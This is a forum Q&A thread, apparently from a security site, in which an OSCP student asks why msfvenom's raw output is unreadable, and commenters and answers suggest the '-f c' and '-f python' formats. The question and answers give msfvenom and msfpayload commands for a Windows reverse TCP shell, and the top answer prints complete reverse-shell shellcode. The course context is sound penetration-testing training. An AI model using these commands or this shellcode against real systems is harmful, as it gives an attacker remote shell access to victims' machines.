# MSFvenom doesn’t generate raw shellcode output properly

Tags: shellcode

I'm doing the Windows Buffer Overflow Exploitation section of the OSCP course, and the author uses a combination of `msfpayload` and `msfencode` to generate a `windows/shell_reverse_tcp` payload encoded with shikata ga nai. This is the command that he uses:

```
msfpayload windows/shell_reverse_tcp LHOST=192.168.0.2 LPORT=443 R | msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai
```

The terminal displays the following encoded shellcode output:

```
x86/shikata_ga_nai succeeded with size 351 (iteration=1)
buf = 
"\xda\xc1\xba\x9d\x4a\x66\xd4\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x52\x83\xeb\xfc\x31\x53\x13\x03\xce\x59\x84\x21\x0c" +
"\xb5\xca\xca\xec\x46\xab\x43\x09\x77\xeb\x30\x5a\x28\xdb" +
…………
…………
"\x76"
```

I can then copy the generated shellcode to my Python script and continue with the exploitation process of an application.

I know that both `msfpayload` and `msfencode`are deprecated, and MSFvenom should be used instead. This is the command that I'm using to achieve the same result as stated above.

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.2 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f raw
```

This is the output that I get in the terminal:

```
���t$����9�X3ɱR1P ��� ���`� �� �� ��>pwZ�WdV��E�Y�V��L��ή�( �!T��� ] ^��~����.����cPN�`] bR)����0� !H̥�?$�g8����7uî����QfΡd�e��J�W�hm3m 4��-&B��-o��l� ��ʗ7ig_�n�Jf�wu�)�!�A J���� �4p��� ���¬���7G¬��0¬A�B¬D
……
�� �N&�
```

As you can see I don’t get the actual shellcode output. What am I doing wrong? I would like to get MSFvenom to output the shellcode that I can copy to my Python script.

Comment: Have you looked at the output formats?

Comment: Yes. I can reproduce this at my end. Will generate an issue at the Metasploit github pages. Please use -f python for now to generate the payload for your python script. It is working fine.

Comment: @void_in. Thanks for your reply. So the issue is with msfvenom itself, and not with the command I'm using.

Comment: @Alex Talked to HD regarding this and actually this is the expected behavior. Raw output is displayed on stderr and since it will have non-printable characters, it won't be displayed on screen. You either have to generate the payload in a particular format (python, c, ruby etc) or redirect the output to a file. msfvenom -p <payload> -o output.bin should work fine for raw. Still you will need a hex editor to examine the output.

Comment: @void_in I will keep that in mind. Thanks for the detailed explanation.

Comment: I'm currently also doing the OSCP training. I use the -f c switch and my payloads work perfectly.

Comment: @Jeroen-ITNerdbox I can confirm that both the -f c and -f python switches work without any problems.

Answer (score 6):

You are using a wrong switch. This should work, tried and tested during OSCP training:

```
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.12.51 LPORT=443 -f c
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x0c\x33\x68"
"\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
root@kali:~#
```

Answer (score 0):

You seem to be missing an "-i" flag. This flag tells the encoder how many times it is supposed to run. Not sure if it is required or the source for your problem but it could be. Also: I like to allways output shellcode in py with "-f py" and to a file so I can remove the "buf += " with find and replace. Also I like to add a "-a (x86 or x64)" and a "--platform (windows)" flag just because of the odd chance that something might go wrong without these.